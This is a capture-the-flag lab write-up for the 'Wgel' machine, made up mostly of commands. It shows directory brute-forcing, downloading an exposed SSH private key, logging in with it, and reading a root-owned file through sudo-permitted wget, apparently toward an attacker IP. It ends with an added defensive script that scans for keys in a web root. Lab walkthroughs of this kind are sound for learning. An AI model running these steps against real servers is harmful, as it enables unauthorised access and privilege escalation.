CTF Wgel

Rustscan

rustscan -a 10.10.227.219

Browse the website

This is the default page.

We have a user, Jessie

Gobuster

gobuster dir -u http://10.10.227.219/. -x txt,html,php -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Let’s run another scan on sitemap.
I’ve tried with the same wordlist but nothing came out.
So I’m using another one.

gobuster dir -u http://10.10.227.219/sitemap -x txt,html,php -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt 

Download id_rsa

wget http://10.10.227.219/sitemap/.ssh/id_rsa

SSH

chmod 600 id_rsa
ssh -i id_rsa [email protected]
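
Added example, not part of the original write-up: a server-side audit for the condition used above, private key material sitting inside the web document root. The function names, the temporary sample tree and the `backup/deploy.key` file are constructed for illustration and contain dummy content only.

```sh
#!/bin/sh
# find_exposed_keys DOCROOT
# Prints "<reason><TAB><path relative to DOCROOT>" for every regular file that
# lives under a .ssh directory or whose first line is a PEM/OpenSSH private
# key header. Output is sorted; exit status 2 means DOCROOT was not readable.
find_exposed_keys() {
    ( cd "$1" 2>/dev/null || exit 2
      find . -type f -exec sh -c '
        for f in "$@"; do
            rel=${f#./}
            case "/$rel" in
                */.ssh/*) printf "ssh-dir\t%s\n" "$rel"; continue ;;
            esac
            # Covers RSA, EC, OPENSSH, ENCRYPTED and bare PKCS#8 headers.
            if head -n 1 "$f" 2>/dev/null |
               grep -Eq "^-----BEGIN ([A-Z0-9]+ )*PRIVATE KEY-----"; then
                printf "pem-key\t%s\n" "$rel"
            fi
        done' sh {} + | sort )
}

# Constructed sample tree shaped like the site in this write-up.
# The "keys" are header lines followed by dummy text, not real keys.
make_sample_docroot() {
    d=$(mktemp -d) || return 1
    mkdir -p "$d/sitemap/.ssh" "$d/sitemap/css" "$d/backup"
    printf '%s\n' '-----BEGIN RSA PRIVATE KEY-----' 'constructed-dummy' \
        > "$d/sitemap/.ssh/id_rsa"
    printf '%s\n' '-----BEGIN OPENSSH PRIVATE KEY-----' 'constructed-dummy' \
        > "$d/backup/deploy.key"
    printf '%s\n' '<html>default page</html>' > "$d/index.html"
    printf '%s\n' 'body{}' > "$d/sitemap/css/style.css"
    echo "$d"
}

# Demo run against the constructed tree.
docroot=$(make_sample_docroot)
find_exposed_keys "$docroot"
rm -rf "$docroot"
```

On a real server, point `find_exposed_keys` at the actual document root; any hit means the key should be treated as compromised and rotated, not just moved.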

First flag

There is no tabulation.

root flag

sudo /usr/bin/wget -i /root/root_flag.txt

https://gtfobins.github.io/gtfobins/wget/
10.10.14.154